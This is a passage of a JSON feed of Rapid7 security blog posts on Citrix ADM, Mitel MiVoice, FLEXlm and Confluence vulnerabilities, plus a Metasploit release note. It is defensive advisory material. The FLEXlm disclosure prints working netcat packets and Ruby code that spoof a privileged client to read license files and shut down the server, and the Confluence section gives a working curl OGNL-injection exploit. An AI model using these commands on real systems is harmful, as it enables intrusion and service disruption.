"2022-07-27T19:26:38", "type": "rapid7blog", "title": "Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26136", "CVE-2022-26137", "CVE-2022-26138"], "modified": "2022-07-27T19:26:38", "id": "RAPID7BLOG:C45DEEA0736048FF17FF9A53E337C92D", "href": "https://blog.rapid7.com/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-27T21:57:35", "description": "\n\nOn Monday, June 14, 2022, Citrix published an [advisory on CVE-2022-27511](<https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512>), a critical improper access control vulnerability affecting their Application Delivery Management (ADM) product.\n\nA remote, unauthenticated attacker can leverage CVE-2022-27511 to reset administrator credentials to the default value at the next reboot. This allows the attacker to use SSH and the default administrator credentials to access the affected management console. The vulnerability has been patched in Citrix ADM 13.1-21.53 and ADM 13.0-85.19 and should be applied as soon as possible. Versions of Citrix ADM before 13.0 and 13.1 are end of life, so Citrix will not make patches available for these versions. Users still on version 12.x are encouraged to upgrade to a supported version.\n\nAt the time of this writing, no exploitation has been observed, and no exploits have been made publicly available. However, given the nature of the vulnerability and the footprint of Citrix ADM, we anticipate that exploitation will happen as soon as an exploit is made available.\n\n## Mitigation guidance\n\nCitrix ADM customers should upgrade their versions of both ADM server and agents as soon as possible. Citrix notes in their [advisory](<https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512>) that they strongly recommend that network traffic to the Citrix ADM\u2019s IP address be segmented, either physically or logically, from standard network traffic.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to [CVE-2022-27511](<https://www.rapid7.com/db/vulnerabilities/citrix-adm-cve-2022-27511/>) with an authenticated vulnerability check available in the June 22, 2022 content release. Please note that this check does not support versions 13.1+ of Citrix ADM.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-16T20:03:55", "type": "rapid7blog", "title": "CVE-2022-27511: Citrix ADM Remote Device Takeover", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27511"], "modified": "2022-06-16T20:03:55", "id": "RAPID7BLOG:C3FB7B0BA665AC291B6331292F32F47A", "href": "https://blog.rapid7.com/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:N"}}, {"lastseen": "2022-07-08T21:58:14", "description": "\n\nIn April 2022, telecommunications company Mitel [published a security advisory](<https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin_22-0002-001-v2.pdf>) on CVE-2022-29499, a data validation vulnerability in the Service Appliance component of [MiVoice Connect](<https://www.mitel.com/products/business-phone-systems/on-site/mivoice-connect>), a business communications product. The vulnerability, which was unpatched at time of publication, arose from insufficient data validation for a diagnostic script and potentially allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution. CVE-2022-29499 has a CVSSv3 score of 9.8.\n\nOn June 23, 2022, security firm Crowdstrike published an [analysis](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) on a ransomware intrusion attempt that had targeted CVE-2022-29499 \u2014 which at the time of detection was an undisclosed zero-day vulnerability \u2014 as an initial access vector. Over the past two weeks, Rapid7 Managed Detection and Response (MDR) has also observed a small number of intrusions that have leveraged CVE-2022-29499 as an initial access vector.\n\nThere is currently no indication that a large number of these appliances are exposed to the public internet, and we have no evidence that this vulnerability is being targeted in wider-scale ransomware campaigns. We are conscious of the fact, however, that the proliferation of ransomware in general has continued to shape risk models for many organizations, and that network perimeter devices are tempting targets for a variety of attackers.\n\n## Affected products\n\nCVE-2022-29499 affects MiVoice Connect deployments (including earlier versions 14.2) that include the MiVoice Connect Service Appliances, SA 100, SA 400 and/or Virtual SA. Vulnerable firmware versions include R19.2 SP3 (22.20.2300.0) and earlier, and R14.x and earlier. See Mitel [product security advisory 22-0002](<https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0002>) and their [security bulletin](<https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin_22-0002-001-v2.pdf>) for additional information.\n\n## Mitigation guidance\n\nMitel MiVoice Connect customers who use vulnerable versions of the Service Appliance in their deployments should update to a fixed version of the appliance immediately. Mitel released patches for CVE-2022-29499 in early June 2022; organizations that have not updated the firmware on their appliances since before that timeframe should apply fixes as soon as possible. Appliances should not be exposed to the open internet. Administrators should also review network filters for these devices and employ the principle of least privilege.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-29499 with a remote, version-based vulnerability check in the July 8, 2022 content release.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-07T19:09:10", "type": "rapid7blog", "title": "Exploitation of Mitel MiVoice Connect SA CVE-2022-29499", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-07-07T19:09:10", "id": "RAPID7BLOG:F35EA4220CACE146EF8E5F845F2B51BF", "href": "https://blog.rapid7.com/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-21T00:06:00", "description": "\n\n_**Note:** Updated October 20, 2022 to clarify that this bypasses CVE-2022-27512 and not CVE-2022-27511, which has a different root cause._\n\nOn June 27, 2022, Citrix released [an advisory](<https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512>) for [CVE-2022-27511](<https://nvd.nist.gov/vuln/detail/CVE-2022-27511>) and [CVE-2022-27512](<https://nvd.nist.gov/vuln/detail/CVE-2022-27512>), which affect Citrix ADM (Application Delivery Management).\n\nRapid7 [investigated these issues](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>) to better understand their impact, and found that the patch is not sufficient to prevent exploitation. We also determined that the worst outcome of this vulnerability is a denial of service - the licensing server can be told to shut down (even with the patch). We were not able to find a way to reset the admin password, as the original bulletin indicated.\n\nIn the course of investigating CVE-2022-27511 and CVE-2022-27512, we determined that the root cause of the issues in Citrix ADM was a vulnerable implementation of [popular licensing software FLEXlm](<https://en.wikipedia.org/wiki/FlexNet_Publisher>), also known as FlexNet Publisher. This disclosure addresses both the core issue in FLEXlm and Citrix ADM\u2019s implementation of it (which resulted in both the original CVEs and later the patch bypass our research team discovered). Rapid7 coordinated disclosure with both companies and [CERT/CC](<https://cert.org>).\n\nAs of this publication, these issues remain unpatched, so IT defenders are urged to reach out to [Revenera](<mailto:psirt-cna@flexerasoftware.com>) and [Citrix](<mailto:secure@citrix.com>) for direct guidence on mitigating these denial of service vulnerabilities and CVE assignment.\n\n## Products\n\nFLEXlm is a license management application that is part of FlexNet licensing, provided by Revenera's Flexnet Software, and is used for license provisioning on many popular network applications, including Citrix ADM. You can read more about FlexNet at [the vendor's website](<https://www.revenera.com/software-monetization/products/software-licensing/flexnet-licensing>).\n\nCitrix ADM is an application provisioning solution from Citrix, which uses FLEXlm for license management. You can read more about Citrix ADM at [the vendor's website](<https://docs.citrix.com/en-us/citrix-application-delivery-management-service/overview.html>).\n\n## Discoverer\n\nThis issue was discovered by [Ron Bowes](<https://twitter.com/iagox86>) of Rapid7 while researching [CVE-2022-27511](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>) and CVE-2022-27512 in Citrix ADM. It is being disclosed in accordance with Rapid7\u2019s [vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\n## Exploitation\n\nCitrix ADM runs on FreeBSD, and remote administrative logins are possible. Using that, we compared two different versions of the Citrix ADM server - before and after the patch.\n\nEventually, we went through each network service, one by one, to check what each one did and whether the patch may have fixed something. When we got to TCP port 27000, we found that `lmgrd` was running. Looking up `lmgrd`, we determined that it's a [licensing server made by FLEXlm](<https://www.openlm.com/what-is-the-difference-between-the-flexlm-lmgrd-and-lmadmin-license-server-managers/>) called [FlexNet Licensing](<https://www.revenera.com/software-monetization/products/software-licensing/flexnet-licensing>) (among other names), made by Revenera. Since the bulletin calls out licensing disruption, this seemed like a sensible place to look; from the bulletin:\n\n> Temporary disruption of the ADM license service. The impact of this includes preventing new licenses from being issued or renewed by Citrix ADM.\n\nIf we look at how `lmgrd` is executed before and after the patch, we find that the command line arguments changed; before:\n \n \n bash-3.2# ps aux | grep lmgrd\n root 3506 0.0 0.0 10176 6408 - S 19:22 0:09.67 /netscaler/lmgrd -l /var/log/license.log -c /mpsconfig/license\n \n\nAnd after:\n \n \n bash-3.2# ps aux | grep lmgrd\n root 5493 0.0 0.0 10176 5572 - S 13:15 0:02.45 /netscaler/lmgrd -2 -p -local -l /var/log/license.log -c /mpsconfig/license\n \n\nIf we look at some [online documentation](<https://cs.uwaterloo.ca/~echrzano/all#6.4>), we see that the `-2 -p` flags are security-related:\n \n \n -2 -p Restricts usage of lmdown, lmreread, and lmremove to a FLEXlm administrator who is by default root. [...]\n \n\n### Patch Analysis\n\nWe tested a Linux copy of FlexNet 11.18.3.1, which allowed us to execute and debug Flex locally. Helpfully, the various command line utilities that FlexNet uses to perform actions (accessible via `lmutil`) use a TCP connection to `localhost`, allowing us to analyze the traffic. For example, the following command:\n \n \n $ ./lmutil lmreread -c ./license/citrix_startup.lic\n lmutil - Copyright (c) 1989-2021 Flexera. All Rights Reserved.\n lmreread successful\n \n\nGenerates a lot of traffic going to `localhost:27000`, including:\n \n \n Sent:\n \n 00000000 2f 4c 0f b0 00 40 01 02 63 05 2c 85 00 00 00 00 /L...@.. c.,.....\n 00000010 00 00 00 02 01 04 0b 12 00 54 00 78 00 02 0b af ........ .T.x....\n 00000020 72 6f 6e 00 66 65 64 6f 72 61 00 2f 64 65 76 2f ron.fedo ra./dev/\n 00000030 70 74 73 2f 32 00 00 78 36 34 5f 6c 73 62 00 01 pts/2..x 64_lsb..\n \n Received:\n \n 00000000 2f 8f 09 c6 00 26 01 0e 63 05 2c 85 41 00 00 00 /....&.. c.,.A...\n 00000010 00 00 00 02 0b 12 01 04 00 66 65 64 6f 72 61 00 ........ .fedora.\n 00000020 6c 6d 67 72 64 00 lmgrd.\n \n Sent:\n \n 00000040 2f 23 34 78 00 24 01 07 63 05 2c 86 00 00 00 00 /#4x.$.. c.,.....\n 00000050 00 00 00 02 72 6f 6e 00 66 65 64 6f 72 61 00 00 ....ron. fedora..\n 00000060 92 00 00 0a ....\n \n Received:\n \n 00000026 2f 54 18 b9 00 a8 00 4f 63 05 2c 86 41 00 00 00 /T.....O c.,.A...\n 00000036 00 00 00 02 4f 4f 00 00 00 00 00 00 00 00 00 00 ....OO.. ........\n 00000046 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 00000056 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 00000066 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 00000076 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 00000086 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 00000096 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 000000A6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 000000B6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 000000C6 00 00 00 00 00 00 00 00 ........ \n \n\nIf we start the service with the `-2 -p` flag, we can no longer run `lmreread`:\n \n \n $ ./lmutil lmreread -c ./license/citrix_startup.lic\n lmutil - Copyright (c) 1989-2021 Flexera. All Rights Reserved.\n lmreread failed: You are not a license administrator. (-63,294)\n \n\nThat appears to be working as intended! Or does it?\n\n### Protocol Analysis\n\nWe spent a substantial amount of time reverse engineering FlexNet's protocol. FlexNet uses a binary protocol with a lot of support and code paths for different (and deprecated) versions of the protocol. But we built a tool (that you can get [on GitHub](<https://github.com/rbowes-r7/doltool>)) that implements the interesting parts of the protocol.\n\nIt turns out, even ignoring the vulnerability, you can do a whole bunch of stuff against the FlexNet service, and none of it even requires authentication! For example, you can grab the path to the license file:\n \n \n $ echo -ne \"\\x2f\\xa9\\x21\\x3a\\x00\\x3f\\x01\\x08\\x41\\x41\\x41\\x41\\x42\\x42\\x42\\x42\\x43\\x00\\x44\\x44\\x01\\x04\\x72\\x6f\\x6f\\x74\\x00\\x43\\x69\\x74\\x72\\x69\\x78\\x41\\x44\\x4d\\x00\\x6c\\x6d\\x67\\x72\\x64\\x00\\x2f\\x64\\x65\\x76\\x2f\\x70\\x74\\x73\\x2f\\x31\\x00\\x67\\x65\\x74\\x70\\x61\\x74\\x68\\x73\\x00\" | nc 10.0.0.9 27000\n LW37/mpsconfig/license/citrix_startup.lic\n \n\nYou can even grab the whole license file:\n \n \n $ echo -ne \"\\x2f\\x8a\\x17\\x2d\\x00\\x37\\x01\\x08\\x41\\x41\\x41\\x41\\x42\\x42\\x42\\x42\\x43\\x00\\x44\\x44\\x01\\x04\\x72\\x6f\\x6f\\x74\\x00\\x43\\x69\\x74\\x72\\x69\\x78\\x41\\x44\\x4d\\x00\\x6c\\x6d\\x67\\x72\\x64\\x\n 00\\x2f\\x64\\x65\\x76\\x2f\\x70\\x74\\x73\\x2f\\x31\\x00\\x00\" | nc -v 10.0.0.9 27000\n Ncat: Version 7.92 ( https://nmap.org/ncat )\n Ncat: Connected to 10.0.0.9:27000.\n L6194# DO NOT REMOVE THIS COMMENT LINE\n # \"\u306e\u30b3\u30e1\u30f3\u30c8\u884c\u306f\u524a\u9664\u3057LK6060NEN\n # NE SUPPRIMEZ PAS CETTE LIGNE DE COMMENTAIRE\n # NO ELIMINAR ESTA L\u00cdNL5926IX PORT=7279\n \n\nAnd you can also remotely re-load the license file and shut down the service if the `-p -2` flag is not set when the server starts. That's the core of the original CVEs - that those flags aren't used and therefore a remote user can take administrative actions.\n\n### Patch Bypass\n\nThe problem is, all of the security features (including declaring your username and privilege level) are client-side choices, which means that without knowing any secret information, the client can self-declare that they are privileged.\n\nThis is what the &quot;authentication&quot; message looks like in `flexnet-tools.rb`:\n \n \n send_packet(0x2f, 0x0102,\n \"\\x01\\x04\" + # If the `\\x04` value here is non-zero, we are permitted to log in\n \"\\x0b\\x10\" + # Read as a pair of uint16s\n \"\\x00\\x54\" + # Read as single uint16\n \"\\x00\\x78\" + # Read as single uint16\n \"\\x00\\x00\\x16\\x97\" + # Read as uint32\n \"root\\x00\" +\n \"CitrixADM\\x00\" +\n \"/dev/pts/1\\x00\" +\n \"\\x00\" + # If I add a string here, the response changes\n \"x86_f8\\x00\" +\n \"\\x01\"\n )\n \n\nIn that example, `root` is the username, and `CitrixADM` is the host. Those can be set to whatever the client chooses, and permissions and logs will reflect that. The first field, `\\x01\\x04`, is also part of the authentication process, where the `\\x04` value specifically enables remote authorization - while we found the part of the binary that reads that value, we are not clear what the actual purpose is.\n\nBy declaring oneself as `root@CitrixADM` (using that message), it bypasses the need to actually authenticate. The `lmdown` field, for shutting down the licensing server, has an addition required field:\n \n \n when 'lmdown'\n out = send_packet(0x2f, 0x010a,\n \"\\x00\" + # Forced?\n \"root\\x00\" + # This is used in a log message\n \"CitrixADM\\x00\" +\n \"\\x00\" +\n \"\\x01\\x00\\x00\\x7f\" +\n \"\\x00\" +\n (LOGIN ? \"islocalSys\" : \"\") + # Only attach islocalSys if we're logging in\n \"\\x00\"\n )\n \n\nThe `islocalSys` value self-identifies the client as privileged, and therefore it is allowed to bypass the `-2 -p` flag and perform restricted actions. This bypasses the patch.\n\n## Impact\n\nRemotely shutting down the FLEXlm licensing server can cause a denial of service condition in the software for which that licensing server is responsible. In this particular case, exploiting this vulnerability can cause a disruption in provisioning licenses through Citrix ADM.\n\n## Remediation\n\nIn the absence of a vendor-supplied patch, users of software that relies on FLEXlm should not expose port 27000/TCP to untrusted networks. Note that in many cases, this would remove the functionality of the license server entirely.\n\n## Disclosure Timeline\n\nThis issue was disclosed in accordance with Rapid7's [vulnerability disclosure] policy(<https://www.rapid7.com/security/disclosure/#zeroday>), but with a slightly faster initial release to CERT/CC, due to the multivendor nature of the issue.\n\n * June, 2022: Issues discovered and documented by Rapid7 researcher [Ron Bowes](<https://twitter.com/iagox86>)\n * Tue, Jul 5, 2022: Disclosed to Citrix via their PSIRT team \nThu, Jul 7, 2022: Disclosed to Flexera via their PSIRT team\n * Wed, Jul 12, 2022: Disclosed to CERT/CC (VU#300762)\n * July - October, 2022: Disclosure discussions between Rapid7, Citrix, Flexera, and CERT/CC through [VINCE](<https://www.kb.cert.org/vince/>) (Case 603).\n * Fri, Oct 14, 2022: Revenera publishes [advisory](<https://community.flexera.com/t5/FlexNet-Publisher-Knowledge-Base/Elevated-Privilege-issue-discovered-in-FlexNet-Publisher-License/ta-p/252331/jump-to/first-unread-message>) indicating FlexNet Publisher 2022 R3 (11.19.2.0) contains a fix for the FlexLM issue.\n * Tue, Oct 18, 2022: This public disclosure\n\n## Rapid7 Customers\n\nThe October 18 content release for InsightVM and Nexpose contains a remote vulnerability check based on the version returned by a running FLEXlm license server, as well as an authenticated check based on the installed version of Citrix ADM. Please note that these checks require the Scan Engine and are not supported via the Insight Agent.\n\n_Update: On October 20, Rapid7 learned that Revenera published an advisory on October 14._", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-18T13:30:00", "type": "rapid7blog", "title": "FLEXlm and Citrix ADM Denial of Service Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27511", "CVE-2022-27512"], "modified": "2022-10-18T13:30:00", "id": "RAPID7BLOG:B6316C65DCD455AD37755DD4C29C655A", "href": "https://blog.rapid7.com/2022/10/18/flexlm-and-citrix-adm-denial-of-service-vulnerability/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:N"}}, {"lastseen": "2022-06-14T17:04:53", "description": "## A Confluence of High-Profile Modules\n\n\n\nThis release features modules covering the Confluence remote code execution bug CVE-2022-26134 and the hotly-debated CVE-2022-30190, a file format vulnerability in the Windows Operating System accessible through malicious documents. Both have been all over the news, and we\u2019re very happy to bring them to you so that you can verify mitigations and patches in your infrastructure. If you\u2019d like to read more about these vulnerabilities, Rapid7 has AttackerKB analyses and blogs covering both Confluence CVE-2022-26134 ([AttackerKB](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>))and Windows CVE-2022-30190 ([AttackKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>)).\n\n## Metasploit 6.2\n\nWhile we release new content weekly (or in real-time if you are using github), we track milestones as well. This week, we released Metasploit 6.2, and it has a whole host of [new functionality, exploits, and fixes](<https://www.rapid7.com/blog/post/2022/06/09/announcing-metasploit-6-2/>)\n\n## New module content (2)\n\n * [Atlassian Confluence Namespace OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/16644>) by Spencer McIntyre, Unknown, bturner-r7, and jbaines-r7, which exploits [CVE-2022-26134](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>) \\- This module exploits an OGNL injection in Atlassian Confluence servers (CVE-2022-26134). A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n * [Microsoft Office Word MSDTJS](<https://github.com/rapid7/metasploit-framework/pull/16635>) by mekhalleh (RAMELLA S\u00e9bastien) and nao sec, which exploits [CVE-2022-30190](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190?referrer=blog>) \\- This PR adds a module supporting CVE-2022-30190 (AKA Follina), a Windows file format vulnerability.\n\n## Enhancements and features (2)\n\n * [#16651](<https://github.com/rapid7/metasploit-framework/pull/16651>) from [red0xff](<https://github.com/red0xff>) \\- The `test_vulnerable` methods in the various SQL injection libraries have been updated so that they will now use the specified encoder if one is specified, ensuring that characters are appropriately encoded as needed.\n * [#16661](<https://github.com/rapid7/metasploit-framework/pull/16661>) from [dismantl](<https://github.com/dismantl>) \\- The impersonate_ssl module has been enhanced to allow it to add Subject Alternative Names (SAN) fields to the generated SSL certificate.\n\n## Bugs fixed (4)\n\n * [#16615](<https://github.com/rapid7/metasploit-framework/pull/16615>) from [NikitaKovaljov](<https://github.com/NikitaKovaljov>) \\- A bug has been fixed in the IPv6 library when creating solicited-multicast addresses by finding leading zeros in last 16 bits of link-local address and removing them.\n * [#16630](<https://github.com/rapid7/metasploit-framework/pull/16630>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `auxiliary/server/capture/smb` module no longer stores duplicate Net-NTLM hashes in the database.\n * [#16643](<https://github.com/rapid7/metasploit-framework/pull/16643>) from [ojasookert](<https://github.com/ojasookert>) \\- The `exploits/multi/http/php_fpm_rce` module has been updated to be compatible with Ruby 3.0 changes.\n * [#16653](<https://github.com/rapid7/metasploit-framework/pull/16653>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- : \nThis PR fixes an issue where named pipe pivots failed to establish the named pipes in intermediate connections.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-06-02T11%3A20%3A37-04%3A00..2022-06-09T09%3A41%3A47-05%3A00%22>)\n * [Full diff 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/compare/6.2.1...6.2.2>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:05", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-30190"], "modified": "2022-06-10T18:07:05", "id": "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "href": "https://blog.rapid7.com/2022/06/10/metasploit-weekly-wrap-up-161/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-07T01:56:25", "description": "\n\nOn June 2, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for CVE-2022-26134, a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability was unpatched when it was published on June 2. As of June 3, both patches and a temporary workaround are available.\n\nCVE-2022-26134 is being actively and widely [exploited in the wild](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). Rapid7's Managed Detection and Response (MDR) team has observed an uptick of likely exploitation of CVE-2022-26134 in customer environments as of June 3.\n\nAll supported versions of Confluence Server and Data Center are affected. \nAtlassian updated their advisory on June 3 to reflect that it's likely that **all versions** (whether supported or not) of Confluence Server and Data Center are affected, but they have yet to confirm the earliest affected version. Organizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately.\n\n## Technical analysis\n\nCVE-2022-26314 is an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server (typically the `confluence` user on Linux installations). Given the nature of the vulnerability, [internet-facing](<https://www.shodan.io/search?query=X-Confluence-Request-Time>) Confluence servers are at very high risk.\n\nLast year, Atlassian Confluence suffered from a different unauthenticated and remote OGNL injection, [CVE-2021-26084](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>). Organizations maintaining an internet-facing Confluence or Data Server may want to consider permanently moving access behind a VPN.\n\n### The vulnerability\n\nAs stated, the vulnerability is an OGNL injection vulnerability affecting the HTTP server. The OGNL payload is placed in the URI of an HTTP request. Any type of HTTP method appears to work, whether valid (GET, POST, PUT, etc) or invalid (e.g. \u201cBALH\u201d). In its simplest form, an exploit abusing the vulnerability looks like this:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/\n \n\nAbove, the exploit is URL-encoded. The exploit encompasses everything from the start of the content location to the last instance of `/`. Decoded it looks like this:\n \n \n ${@java.lang.Runtime@getRuntime().exec(\"touch /tmp/r7\")}\n \n\nEvidence of exploitation can typically be found in access logs because the exploit is stored in the HTTP request field. For example, on our test Confluence (version 7.13.6 LTS), the log file `/opt/atlassian/confluence/logs/conf_access_log.<yyyy-mm-dd>.log` contains the following entry after exploitation:\n \n \n [02/Jun/2022:16:02:13 -0700] - http-nio-8090-exec-10 10.0.0.28 GET 